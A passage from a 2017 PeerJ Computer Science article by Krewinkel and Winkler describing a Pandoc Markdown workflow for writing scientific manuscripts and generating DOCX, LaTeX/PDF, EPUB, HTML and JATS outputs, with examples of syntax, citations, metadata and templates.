‘article processing’, which includes the manuscript handling during peer review and production represents the most expensive part. Therefore, we investigated a strategy for the efficient formatting of scientific manuscripts. Current standard publishing formats Generally speaking, a scientific manuscript is composed of contents and formatting. While the content, i.e., text, figures, tables, citations etc., may remain the same between different publishing forms and journal styles, the formatting can be very different. Most publishers require the formatting of submitted manuscripts in a certain format. Ignoring this Guide Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 4/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 Table 1 Current standard formats for scientific publishing. Type Description Use Syntax Reference DOCX Office Open XML WYSIWYG editing XML, ZIP Ngo (2006) ODT OpenDocument WYSIWYG editing XML, ZIP Brauer et al. (2005) PDF Portable document Print replacement PDF International Organization for Standardizationd (2013) EPUB Electronic publishing e-books HTML5, ZIP Eikebrokk, Dahl & Kessel (2014) JATS Journal article tag suite Journal publishing XML National Information Standards Organization (2012) LATEX Typesetting system High-quality print TEX Lamport (1994) HTML Hypertext markup Websites (X)HTML Raggett, Le Hors & Jacobs (1999) and Hickson et al. (2014) MD Markdown Lightweight markup Plain text MD Ovadia (2014) and Leonard (2016) Table 2 Examples for formatting elements and their implementations in different markup languages. Element Markdown LATEX HTML Structure Section # Intro \section{Intro} <h1>Intro</h1> Subsection ## History \subsection{History} <h2>History</h2> Text style Bold **text** \textbf{text} <b>text</b> Italics *text* \textit{text} <i>text</i> Links HTTP link <https://arxiv.org> \usepackage{url}\url{https://arxiv.org} <a href="https://arxiv.org"></a> for Authors, (for example, by submitting a manuscript with a different reference style), gives a negative impression with a journal’s editorial staff. Manuscripts which are too carelessly prepared can even provoke a straight ‘desk-reject’ (Volmer & Stokes, 2016). Currently DOC(X), LATEX and/ or PDF file formats are the most frequently used formats for journal submission platforms. However, even if the content of a submitted manuscript might be accepted during the peer review ‘as is’, the format still needs to be adjusted to the particular publication style in the production stage. For the electronic distribution and archiving of scientific works, which is gaining more and more importance, additional formats (EPUB, (X)HTML, JATS) need to be generated. Table 1 lists the file formats which are currently the most relevant ones for scientific publishing. Although the content elements of documents, such as title, author, abstract, text, figures, tables, etc., remain the same, the syntax of the file formats is rather different. Table 2 demonstrates some simple examples of differences in different markup languages. Documents with the commonly used Office Open XML (DOCX Microsoft Word files) and OpenDocument (ODT LibreOffice) file formats can be opened in a standard text editor after unzipping. However, content and formatting information is distributed into various folders and files. Practically speaking, those file formats require the use of special word processing software. From a writer’s perspective, the use of What You See Is What You Get (WYSIWYG) programs such as Microsoft Word, WPS Office or LibreOffice might be convenient, because Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 5/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 the formatting of the document is directly visible. But the complicated syntax specifications often result in problems when using different software versions and for collaborative writing. Simple conversions between file formats can be difficult or impossible. In a worst-case scenario, ‘old’ files cannot be opened any more for lack of compatible software. In some parts of the scientific community therefore LATEX, a typesetting program in plain text format, is very popular. With LATEX, documents with highest typographic quality can be produced. However, the source files are cluttered with LATEX commands and the source text can be complicated to read. Causes of compilation errors in LATEX are sometimes difficult to find. Therefore, LATEX is not very user friendly, especially for casual writers or beginners. In academic publishing, it is additionally desirable to create different output formats from the same source text: • For the publishing of a book, with a print version in PDF and an electronic version in EPUB. • For the distribution of a seminar script, with an online version in HTML and a print version in PDF. • For submitting a journal manuscript for peer-review in DOCX, as well as a preprint version with another journal style in PDF. • For archiving and exchanging article data using the Journal Article Tag Suite (JATS) (National Information Standards Organization, 2012), a standardized format developed by the National Library of Medicine (NLM). Some of the tasks can be performed with LATEX, but an integrated solution remains a challenge. Several programs for the conversion between documents formats exist, such as the e-book library program calibre (http://calibre-ebook.com/). But the results of such conversions are often not satisfactory and require substantial manual corrections. Therefore, we were looking for a solution that enables the creation of scientific manuscripts in a simple format, with the subsequent generation of multiple output formats. The need for hybrid publishing has been recognized outside of science (Kielhorn, 2011), but the requirements specific to scientific publishing have not been addressed so far. Therefore, we investigated the possibility to generate multiple publication formats from a simple manuscript source file. CONCEPTS OF MARKDOWN AND PANDOC Markdown was originally developed by John Gruber in collaboration with Aaron Swartz, with the goal to simplify the writing of HTML documents (http://daringfireball.net/ projects/markdown/). Instead of coding a file in HTML syntax, the content of a document is written in plain text and annotated with simple tags which define the formatting. Subsequently, the Markdown (MD) files are parsed to generate the final HTML document. With this concept, the source file remains easily readable and the author can focus on the contents rather than formatting. Despite its original focus on the web, the MD format has been proven to be well suited for academic writing (Ovadia, 2014). In particular, Pandoc-flavored MD (http://pandoc.org/) adds several extensions which facilitate the Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 6/23 https://peerj.com http://calibre-ebook.com/ http://daringfireball.net/projects/markdown/ http://daringfireball.net/projects/markdown/ http://pandoc.org/ http://dx.doi.org/10.7717/peerj-cs.112 Figure 3 Workfow for the generation of multiple document formats with Pandoc. The markdown (MD) file contains the manuscript text with formatting tags, and can also refer to external files such as images or reference databases. The Pandoc processor converts the MD file to the desired output formats. Documents, citations etc. can be defined in style files or templates. authoring of academic documents and their conversion into multiple output formats. Table 2 demonstrates the simplicity of MD compared to other markup languages. Figure 3 illustrates the generation of various formatted documents from a manuscript in Pandoc MD. Some relevant functions for scientific texts are explained below in more detail. MARKDOWN EDITORS AND ONLINE EDITING The usability of a text editor is important for the author, either writing alone or with several co-authors. In this section we present software and strategies for different scenarios. Figure 4 summarizes various options for local or networked editing of MD files. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 7/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 Figure 4 Markdown files can be edited on local devices or on cloud drives. A local or remote Git reposi- tory enables advanced advanced version control. Markdown editors Due to MD’s simple syntax, basically any text editor is suitable for editing markdown files. The formatting tags are written in plain text and are easy to remember. Therefore, the author is not distracted by looking around for layout options with the mouse. For several popular text editors, such as vim (http://www.vim.org/), GNU Emacs (https://www.gnu.org/software/emacs/), atom (https://atom.io/) or geany (http://www.geany.org/), plugins provide additional functionality for markdown editing; for example, syntax highlighting, command helpers, live preview or structure browsing. Various dedicated markdown editors have been published as well. Many of those are cross-platform compatible, such as Abricotine (http://abricotine.brrd.fr/), ghostwriter (https://github.com/wereturtle/ghostwriter) and CuteMarkEd (https://cloose.github.io/ CuteMarkEd/). The lightweight format is also ideal for writing on mobile devices. Numerous applications are available on the App stores for Android and iOS systems. The programs Swype and Dragon (http://www.nuance.com/) facilitate the input of text on such devices by guessing words from gestures and speech recognition (dictation). Figure 5 shows the editing of a markdown file, using the cross-platform editor Atom with several markdown plugins. Online editing and collaborative writing Storing manuscripts on network drives (The Cloud) has become popular for several reasons: • Protection against data loss. • Synchronization of documents between several devices. • Collaborative editing options. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 8/23 https://peerj.com http://www.vim.org/ https://www.gnu.org/software/emacs/ https://atom.io/ http://www.geany.org/ http://abricotine.brrd.fr/ https://github.com/wereturtle/ghostwriter https://cloose.github.io/CuteMarkEd/ https://cloose.github.io/CuteMarkEd/ http://www.nuance.com/ http://dx.doi.org/10.7717/peerj-cs.112 Figure 5 Document directory tree, editing window and HTML preview using the Atom editor. Markdown files on a Google Drive (https://drive.google.com) for instance can be edited online with StackEdit (https://stackedit.io). Figure 6 demonstrates the online editing of a markdown file on an ownCloud (https://owncloud.com/) installation. OwnCloud is an Open Source software platform, which allows the set-up of a file server on personal web- space. The functionality of an ownCloud installation can be enhanced by installing plugins. Even mathematical formulas are rendered correctly in the HTML live preview window of the ownCloud markdown plugin (Fig. 6). The collaboration and authoring platform Authorea (https://www.authorea.com/) also supports markdown as one of multiple possible input formats. This can be beneficial for collaborations in which one or more authors are not familiar with markdown syntax. Document versioning and change control Programmers, especially when working in distributed teams, rely on version control systems to manage changes of code. Currently, Git (https://git-scm.com/), which is also used for the development of the Linux kernel, is one of the most employed software solutions for versioning. Git allows the parallel work of collaborators and has an efficient merging and conflict resolution system. A Git repository may be used by a single local author to keep track of changes, or by a team with a remote repository; for example, on Github (https://github.com/) or Bitbucket (https://bitbucket.org/). Because of the plain text format of markdown, Git can be used for version control and distributed writing. For Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 9/23 https://peerj.com https://drive.google.com https://stackedit.io https://owncloud.com/ https://www.authorea.com/ https://git-scm.com/ https://github.com/ https://bitbucket.org/ http://dx.doi.org/10.7717/peerj-cs.112 Figure 6 Direct online editing of this manuscript with live preview using the ownCloud Markdown Editor plugin by Robin Appelman. the writing of the present article, the co-authors (Germany and Mexico) used a remote Git repository on Bitbucket. The plain text syntax of markdown facilitates the visualization of differences of document versions, as shown in Fig. 7. PANDOC MARKDOWN FOR SCIENTIFIC TEXTS In the following section, we demonstrate the potential for typesetting scientific manuscripts with Pandoc using examples for typical document elements, such as tables, figures, formulas, code listings and references. A brief introduction is given by Dominici (2014). The complete Pandoc User’s Manual is available at http://pandoc.org/MANUAL.html. Tables There are several options to write tables in markdown. The most flexible alternative—which was also used for this article—are pipe tables. The contents of different cells are separated by pipe symbols (|): Left | Center | Right | Default :-----|:------:|------:|--------- LLL | CCC | RRR | DDD Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 10/23 https://peerj.com http://pandoc.org/MANUAL.html http://dx.doi.org/10.7717/peerj-cs.112 Figure 7 Version control and collaborative editing using a Git repository on Bitbucket. gives Left Center Right Default LLL CCC RRR DDD The headings and the alignment of the cells are given in the first two lines. The cell width is variable. The Pandoc parameter --columns=NUM can be used to define the length of lines in characters. If contents do not fit, they will be wrapped. Complex tables (for example, tables featuring multiple headers or those containing cells spanning multiple rows or columns), are currently not representable in Markdown format. However, it is possible to embed LATEX and HTML tables into the document. These format-specific tables will only be included in the output if a document of the respective format is produced. This is method can be extended to apply any kind of format-specific typographic functionality which would otherwise be unavailable in Markdown syntax. Figures and images Images are inserted as follows: ![alt text](image location/ name) e.g., Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 11/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 ![Publishing costs](fig-hybrid-publishing-costs.png) The alt text is used e.g., in HTML output. Image dimensions can be defined in braces: ![](fig-hybrid-publishing-costs.png){width=50mm} As well, an identifier for the figure can be defined with #, resulting e.g., in the image attributes {#figure1 height=30%}. A paragraph containing only an image is interpreted as a figure. The alt text is then output as the figure’s caption. Symbols Scientific texts often require special characters; for example, Greek letters, mathematical and physical symbols, and so on. The UTF-8 standard, developed and maintained by the Unicode Consortium, enables the use of characters across languages and computer platforms. The encoding is defined as RFC document 3629 of the Network Working group (Yergeau, 2003) and as ISO standard ISO/IEC 10646:2014 (International Organization for Standardization, 2014). Specifications of Unicode and code charts are provided on the Unicode homepage (http://www.unicode.org/). In Pandoc Markdown documents, Unicode characters such as ◦, α, ä, Å can be inserted directly and passed to the different output documents. The correct processing of MD with UTF-8 encoding to LATEX/PDF output requires the use of the --latex-engine=xelatex option and the use of an appropriate font. The Times-like XITS font (https://github.com/khaledhosny/xits-math), suitable for high quality typesetting of scientific texts, can be set in the LATEX template: \usepackage{unicode-math} \setmainfont [ Extension = .otf, UprightFont = *-regular, BoldFont = *-bold, ItalicFont = *-italic, BoldItalicFont = *-bolditalic, ]{xits} \setmathfont [ Extension = .otf, BoldFont = *bold, ]{xits-math} To facilitate the input of specific characters, so-called mnemonics can be enabled in some editors (e.g., in atom by the character-table package). For example, the 2- character mnemonics ‘:u’ gives ‘ü’ (diaeresis), or ‘D*’ the Greek 1. The possible character mnemonics and character setsare listed in RFC 1345: http://www.faqs.org/rfcs/rfc1345.html (Simonsen, 1992). Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 12/23 https://peerj.com http://www.unicode.org/ https://github.com/khaledhosny/xits-math http://www.faqs.org/rfcs/rfc1345.html http://dx.doi.org/10.7717/peerj-cs.112 Formulas Formulas are written in LATEX mode using the delimiters $. For example, the formula for calculating the standard deviation s of a random sampling would be written as: $s=\sqrt{\frac{1}{N-1}\sum_{i=1}^N(x_i-\overline{x})^{2}}$ and gives: s= √√√√ 1 N −1 N∑ i=1 (xi−x)2 with xi the individual observations, x the sample mean and N the total number of samples. Pandoc parses formulas into internal structures and allows conversion into formats other than LATEX. This allows for format-specific formula representation and enables computational analysis of the formulas (Corbí& Burgos, 2015). Code listings Verbatim code blocks are indicated by three tilde symbols: ~~~ verbatim code ~~~ Typesetting inline code is possible by enclosing text between back ticks. ‘inline code‘ Other document elements These examples are only a short demonstration of the capacities of Pandoc concerning scientific documents. For more detailed information, we refer to the official manual (http://pandoc.org/MANUAL.html). CITATIONS AND BIOGRAPHY The efficient organization and typesetting of citations and bibliographies is crucial for academic writing. Pandoc supports various strategies for managing references. For processing the citations and the creation of the bibliography, the command line parameter --filter pandoc-citeproc is used, with variables for the reference database and the bibliography style. The bibliography will be located automatically at the header # References or # Bibliography. Reference databases Pandoc is able to process all mainstream literature database formats, such as RIS, BIB, etc. However, for maintaining compatibility with LATEX/ BIBTEX, the use of BIB databases is recommended. The used database either can be defined in the YAML metablock of the MD file (see below) or it can be passed as parameter when calling Pandoc. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 13/23 https://peerj.com http://pandoc.org/MANUAL.html http://dx.doi.org/10.7717/peerj-cs.112 Inserting citations For inserting a reference, the database key is given within square brackets, and indicated by an ‘@’. It is also possible to add information, such as page: [@suber_open_2012; @benkler_wealth_2006, 57 ff.] gives (Suber, 2012; Benkler, 2006, p. 57 ff.). Styles The Citation Style Language (CSL) (http://citationstyles.org/) is used for the citations and bibliographies. This file format is supported, for example, by the reference management programs Mendeley (https://www.mendeley.com/), Papers (http://papersapp.com/) and Zotero (https://www.zotero.org/). CSL styles for particular journals can be found from the Zotero style repository (https://www.zotero.org/styles). The bibliography style that Pandoc should use for the target document can be chosen in the YAML block of the Markdown document or can be passed in as an command line option. The latter is more recommendable, because distinct bibliography style may be used for different documents. Creation of LATEX natbib citations For citations in scientific manuscripts written in LATEX, the natbib package is widely used. To create a LATEX output file with natbib citations, Pandoc simply has to be run with the --natbib option, but without the --filter pandoc-citeproc parameter. Database of cited references To share the bibliography for a certain manuscript with co-authors or the publisher’s production team, it is often desirable to generate a subset of a larger database, which only contains the cited references. If LATEX output was generated with the --natbib option, the compilation of the file with LATEX gives an AUX file (in the example named md-article.aux), which subsequently can be extracted using BibTool (https://github.com/ge-ne/bibtool): ~~~ bibtool -x md-article.aux -o bibshort.bib ~~~ In this example, the article database will be called bibshort.bib. For the direct creation of an article specific BIB database without using LATEX, we wrote a simple Perl script called mdbibexport (https://github.com/robert-winkler/mdbibexport). META INFORMATION OF THE DOCUMENT Bourne (2005) argues that journals should be effectively equivalent to biological databases: both provide data which can be referenced by unique identifiers like DOI or, for example, gene IDs. Applying the semantic-web ideas of Berners-Lee & Hendler (2001) to this domain can make this vision a reality. Here we show how metadata can be specified in Markdown. We propose conventions, and demonstrate their suitability to enable interlinked and semantically enriched journal articles. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 14/23 https://peerj.com http://citationstyles.org/ https://www.mendeley.com/ http://papersapp.com/ https://www.zotero.org/ https://www.zotero.org/styles https://github.com/ge-ne/bibtool https://github.com/robert-winkler/mdbibexport http://dx.doi.org/10.7717/peerj-cs.112 Document information such as title, authors, abstract etc. can be defined in a metadata block written in YAML syntax. YAML (‘‘YAML Ain’t Markup Language’’, http://yaml.org/) is a data serialization standard in simple, human readable format. Variables defined in the YAML section are processed by Pandoc and integrated into the generated documents. The YAML metadata block is recognized by three hyphens (---) at the beginning, and three hyphens or dots (...) at the end; for example; --- title: Formatting Open Science subtitle: agile creation of multiple document types date: 2017-02-10 ... The public availability of all relevant information is a central aspect of Open Science. Analogous to article contents, data should be accessible via default tools. We believe that this principle must also be applied to article metadata. Thus, we created a custom Pandoc writer that emits the article’s data as JSON–LD (Lanthaler & Gütl, 2012), allowing for informational and navigational queries of the journal’s data with standard tools of the semantic web. The above YAML information would be output as: { "@context": { "@vocab": "http://schema.org/", "date": "datePublished", "title": "headline", "subtitle": "alternativeTitle" }, "@type": "ScholarlyArticle", "title": "Formatting Open Science", "subtitle": "agile creation of multiple document types", "date": "2017-02-10" } This format allows processing of the information by standard data processing software and browsers. Flexible metadata authoring We developed a method to allow writers the flexible specification of authors and their respective affiliations. Author names can be given as a string, via the key of a single-element object, or explicitly as a name attribute of an object. Affiliations can be specified directly as properties of the author object, or separately in the institute object. Additional information, for example, email addresses or identifiers like ORCID (Haak et al., 2012), can be added as additional values: author: - John Doe: Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 15/23 https://peerj.com http://yaml.org/ http://dx.doi.org/10.7717/peerj-cs.112 institute: fs email: john.doe@example.com orcid: 0000-0000-0000-0000 institute: fs: Science Formatting Working Group JATS support The journal article tag suite (JATS) was developed by the National Library of Medicine (NLM) and standardized by ANSI/NISO as an archiving and exchange format of journal articles and the associated metadata (National Information Standards Organization, 2012), including data of the type shown above. The pandoc-jats writer by Martin Fenner is a plugin usable with Pandoc to produce JATS-formatted output. The writer was adapted to be compatible with our metadata authoring method, allowing for simple generation of files which contain the relevant metadata. Citation types Writers can add information about the reason a citation is given. This might help reviewers and readers, and can simplify the search for relevant literature. We developed an extended citation syntax that integrates seamlessly into Markdown and can be used to add complementary information to citations. Our method is based on CiTO, the Citation Typing Ontology (Shotton, 2010), which specifies a vocabulary for the motivation when citing a resource. The type of a citations can be added to a Markdown citation using @CITO_PROPERTY:KEY, where CITO_PROPERTY is a supported CiTO property, and KEY is the usual citation key. Our tool extracts that information and includes it in the generated linked data output. A general CiTO property (cites) is used, if no CiTO property is found in a citation key. The work at hand will always be the subject of the generated semantic subject–predicate– object triples. Some CiTO predicates cannot be used in a sensical way under this condition. Focusing on author convenience, we use this fact to allow shortening of properties when sensible. For example, if authors of a biological paper include a reference to the paper describing a method which was used in their work, this relation can be described by the uses_method_in property of the CiTO ontology. The inverse property, provides_method_for, would always be nonsensical in this context as implied by causality. It is therefore not supported by our tool. This allows us to introduce an abbreviation (method) for the latter property, as any ambiguity has been eliminated. Users of Western blotting might hence write @method_in:towbin_1979 or even just @method:towbin_1979, where towbin_1979 is the citation identifier of the describing paper by Towbin, Staehelin & Gordon (1979). EXAMPLE: MANUSCRIPT WITH OUTPUT OF DOCX/ODT FORMAT AND LATEX/PDF FOR SUBMISSION TO DIFFERENT JOURNALS Scientific manuscripts have to be submitted in a format defined by the journal or publisher. At the moment, DOCX is the most common file format for manuscript submission. Some Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 16/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 publishers also accept or require LATEX or ODT formats. Additional to the general style of the manuscript—organization of sections, fonts, etc.—the citation style of the journal must also be followed. Often, the same manuscript has to be prepared for different journals; for example, if the manuscript was rejected by a journal and has to be formatted for another one, or if a preprint of the paper is submitted to an archive that requires a distinct document format than the targeted peer-reviewed journal. In this example, we want to create a manuscript for a PLoS journal in DOCX and ODT format for WYSIWYG word processors. Further, a version in LATEX/ PDF should be produced for PeerJ submission and archiving at the PeerJ preprint server. The examples for DOCX/ ODT are kept relatively simple, to show the proof-of-principle and to provide a plain document for the development of own templates. Nevertheless, the generated documents should be suitable for submission after little manual editing. For specific journals it may be necessary to create more sophisticated templates or to copy/ paste the generic DOCX/ ODT output into the publisher’s template. Development of a DOCX/ ODT template A first DOCX document with bibliography in PLoS format is created with Pandoc DOCX output: pandoc -S -s --csl=plos.csl --filter pandoc-citeproc -o pandoc-manuscript.docx agile-editing-pandoc.md The parameters -S -s generate a typographically correct (dashes, non-breaking spaces etc.) stand-alone document. A bibliography with the PLoS style is created by the citeproc filter setting --csl=plos.csl --filter pandoc-citeproc. The document settings and styles of the resulting file pandoc-manuscript.docx can be optimized and be used again as document template (--reference-docx=pandoc-manuscript.docx): instead of . pandoc -S -s --reference-docx=pandoc-manuscript.docx --csl=plos.csl --filter pandoc-citeproc -o outfile.docx agile-editing-pandoc.md It is also possible to directly re-use a previous output file as template (i.e., template and output file have the same file name): pandoc -S -s --columns=10 --reference-docx=pandoc-manuscript.docx --csl=plos.csl --filter=pandoc-citeproc -o pandoc-manuscript.docx agile-editing-pandoc.md In this way, the template can be incrementally adjusted to the desired document formatting. The final document may be employed later as Pandoc template for other manuscripts with the same specifications. In this case, running Pandoc the first time with the template, the contents of the new manuscript would be filled into the provided DOCX template. A page with DOCX manuscript formatting of this article is shown in Fig. 8. The same procedure can be applied with an ODT formatted document. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 17/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 Figure 8 Opening a Pandoc-generated DOCX in Microsoft Office 365. Development of a TEX/PDF template The default Pandoc LATEX template can be written into a separate file by: pandoc -D latex > template-peerj.latex This template can be adjusted; for example, by defining Unicode encoding (see above), by including particular packages or setting document options (line numbering, font size). The template can then be used with the Pandoc parameter --template=pandoc-peerj.latex. The templates used for this document are included as Supplemental Material (see section ‘Software and Code Availability’ below). Styles for HTML and EPUB The style for HTML and EPUB formats can be defined in .css stylesheets. The Supplemental Material (see section ‘Software and Code Availability’ below) contains a simple example .css file for modifying the HTML output, which can be used with the Pandoc parameter -c pandoc.css. AUTOMATING DOCUMENT PRODUCTION The commands necessary to produce the document in a specific formats or styles can be defined in a simple Makefile. An example Makefile is included in the source code of Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 18/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 Table 3 Relevant software used for this article. Software Use Authors Version Release Homepage/repository Pandoc Universal markup converter John MacFarlane 1.16.0.2 16/01/13 http://www.pandoc.org Pandoc-citeproc Library for CSL citations with Pandoc John MacFarlane, Andrea Rossato 0.9.1 16/03/19 https://github.com/jgm/ pandoc-citeproc Pandoc-jats Creation of JATS files with Pandoc Martin Fenner 0.9 15/04/26 https://github.com/ mfenner/pandoc-jats ownCloud Personal cloud software ownCloud GmbH, Community 9.1.1 16/09/20 https://owncloud.org/ Markdown Editor Plugin for ownCloud Robin Appelman 0.1 16/03/08 https://github.com/ icewind1991/files_ markdown BibTool Bibtex database tool Gerd Neugebauer 2.63 16/01/16 https://github.com/ge- ne/bibtool this article. The desired output file format can be chosen when calling make. For example, make outfile.pdf produces this article in PDF format. Calling make without any option creates all listed document types. A Makefile producing DOCX, ODT, JATS, PDF, LATEX, HTML and EPUB files of this document is provided as Supplemental Material (see section ‘Software and Code Availability’ below). Cross-platform compatibility The make process was tested on Windows 10 and Linux 64 bit. All documents—DOCX, ODT, JATS, LATEX, PDF, EPUB and HTML—were generated successfully, which demonstrates the cross-platform compatibility of the workflow. PERSPECTIVE Following the trend to peer production, the formatting of scientific content must become more efficient. Markdown/Pandoc has the potential to play a key role in the transition from proprietary to community-driven academic production. Important research tools, such as the statistical computing and graphics language R (R Core Team, 2014) and the Jupyter notebook project (Kluyver et al., 2016) have already adopted the MD syntax (for example, http://rmarkdown.rstudio.com/). The software for writing manuscripts in MD is mature enough to be used by academic writers. Therefore, publishers also should consider implementing the MD format into their editorial platforms. CONCLUSIONS Authoring scientific manuscripts in markdown (MD) format is straight-forward, and manual formatting is reduced to a minimum. The simple syntax of MD facilitates document editing and collaborative writing. The rapid conversion of MD to multiple formats such as DOCX, LATEX, PDF, EPUB and HTML can be done easily using Pandoc, and templates enable the automated generation of documents according to specific journal styles. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 19/23 https://peerj.com http://www.pandoc.org https://github.com/jgm/pandoc-citeproc https://github.com/jgm/pandoc-citeproc https://github.com/mfenner/pandoc-jats https://github.com/mfenner/pandoc-jats https://owncloud.org/ https://github.com/icewind1991/files_markdown https://github.com/icewind1991/files_markdown https://github.com/icewind1991/files_markdown https://github.com/ge-ne/bibtool https://github.com/ge-ne/bibtool http://rmarkdown.rstudio.com/ http://dx.doi.org/10.7717/peerj-cs.112 The additional features we implemented facilitate the correct indexing of meta information of journal articles according to the ‘semantic web’ philosophy. Altogether, the MD format supports the agile writing and fast production of scientific literature. The associated time and cost reduction especially favours community-driven publication strategies. SOFTWARE AND CODE AVAILABILITY The relevant software for creating this manuscript used is cited according to (Smith, Katz & Niemeyer, 2016) and listed in Table 3. Since unique identifiers are missing for most software projects, we only refer to the project homepages or software repositories: ACKNOWLEDGEMENTS We cordially thank Dr. Gerd Neugebauer for his help in creating a subset of a bibtex data base using BibTool, as well as Dr. Ricardo A. Chávez Montes, Prof. Magnus Palmblad and Martin Fenner for comments on the manuscript. Warm thanks also go to Anubhav Kumar and Jennifer König for proofreading. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work was funded by the Consejo Nacional de Ciencia y Tecnología (CONACyT) Mexico, with the grant FRONTERAS 2015-2/814 and by institutional funding of the Centro de Investigación y de Estudios Avanzados del Instituto Politécnico Nacional (CINVESTAV). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Consejo Nacional de Ciencia y Tecnología (CONACyT). FRONTERAS 2015-2/814. Centro de Investigación y de Estudios Avanzados del Instituto Politécnico Nacional (CINVESTAV). Competing Interests Albert Krewinkel is a voluntary member of the Pandoc Development Team. Robert Winkler is an Academic Editor for PeerJ. We have no financial/ legal conflict of interest. Author Contributions • Albert Krewinkel and Robert Winkler conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, programming. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 20/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.112 Data Availability The following information was supplied regarding data availability: The software created as part of this article, Pandoc-scholar, is suitable for general use and has been published at https://github.com/pandoc-scholar/pandoc-scholar; 10.5281/zenodo.376761. The source code of this manuscript, as well as the templates and Pandoc Makefile, have been deposited to https://github.com/robert-winkler/scientific- articles-markdown/. Drawings for document types, devices and applications have been adopted from Calibre (http://calibre-ebook.com/), openclipart (https://openclipart.org/) and the GNOME Theme Faenza (https://code.google.com/archive/p/faenza-icon-theme/). REFERENCES Benkler Y. 2006. The wealth of networks: how social production transforms markets and freedom. New Haven: Yale University Press. Berners-Lee T, Hendler J. 2001. Publishing on the semantic web. Nature 410:1023–1024 DOI 10.1038/35074206. Bourne P. 2005. Will a biological database be different from a biological journal? PLOS Computational Biology 1:e34 DOI 10.1371/journal.pcbi.0010034. Brauer M, Durusau P, Edwards G, Faure D, Magliery T, Vogelheim D. 2005. Open Document Format for Office Applications (OpenDocument) v1.0. OASIS. Available at https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=office. Brown C. 2001. The E-volution of preprints in the scholarly communication of physicists and astronomers. Journal of the Association for Information Science and Technology 52:187–200 DOI 10.1002/1097-4571(2000)9999:9999<::AID-ASI1586>3.0.CO;2-D. Brown C. 2003. The role of electronic preprints in chemical communication: analysis of citation, usage, and acceptance in the journal literature. Journal of the Association for Information Science and Technology 54:362–371 DOI 10.1002/asi.10223. Brown PO, Eisen MB, Varmus HE. 2003. Why PLOS Became a Publisher. PLOS Biology 1(1):e36 DOI 10.1371/journal.pbio.0000036. Butler D. 2001. Los alamos loses physics archive as preprint pioneer heads east. Nature 412:3–4 DOI 10.1038/35083708. Callaway E. 2013. Preprints come to life. Nature News 503:180 DOI 10.1038/503180a. Corbí A, Burgos D. 2015. Semi-automated correction tools for mathematics-based exercises in MOOC environments. International Journal of Interactive Multimedia and Artificial Intelligence 3:89–95 DOI 10.9781/ijimai.2015.3312. Dominici M. 2014. An overview of Pandoc. TUGboat 35:44–50. Eikebrokk T, Dahl TA, Kessel S. 2014. EPUB as Publication format in open access journals: tools and workflow. Code4Lib Epub ahead of print April 16 2014. Eisen M. 2003. Publish and be praised. The Guardian. Available at https://www. theguardian.com/education/2003/oct/09/research.highereducation (accessed on 9 October 2003). Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 21/23 https://peerj.com https://github.com/pandoc-scholar/pandoc-scholar https://doi.org/10.5281/zenodo.376761 https://github.com/robert-winkler/scientific-articles-markdown/ https://github.com/robert-winkler/scientific-articles-markdown/ http://calibre-ebook.com/ https://openclipart.org/ https://code.google.com/archive/p/faenza-icon-theme/ http://dx.doi.org/10.1038/35074206 http://dx.doi.org/10.1371/journal.pcbi.0010034 https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=office http://dx.doi.org/10.1002/1097-4571(2000)9999:9999\lt ::AID-ASI1586\gt 3.0.CO;2-D http://dx.doi.org/10.1002/asi.10223 http://dx.doi.org/10.1371/journal.pbio.0000036 http://dx.doi.org/10.1038/35083708 http://dx.doi.org/10.1038/503180a http://dx.doi.org/10.9781/ijimai.2015.3312 https://www.theguardian.com/education/2003/oct/09/research.highereducation https://www.theguardian.com/education/2003/oct/09/research.highereducation http://dx.doi.org/10.7717/peerj-cs.112 Fecher B, Friesike S. 2014. Open science: one term, five schools of thought. In: Bartling S, Friesike S, eds. Opening science. Cham: Springer International Publishing, 17–47. Ginsparg P. 1994. First steps towards electronic research communication. Computers in Physics 8:390–396 DOI 10.1063/1.4823313. Haak LL, Fenner M, Paglione L, Pentz E, Ratner H. 2012. ORCID: a system to uniquely identify researchers. Learned Publishing 25:259–264 DOI 10.1087/20120404. Hickson I, Berjon R, Faulkner S, Leithead T, Navara ED, O’Connor E, Pfeiffer S, Faulkner S, Navara ED, Leithead T, Berjon R, 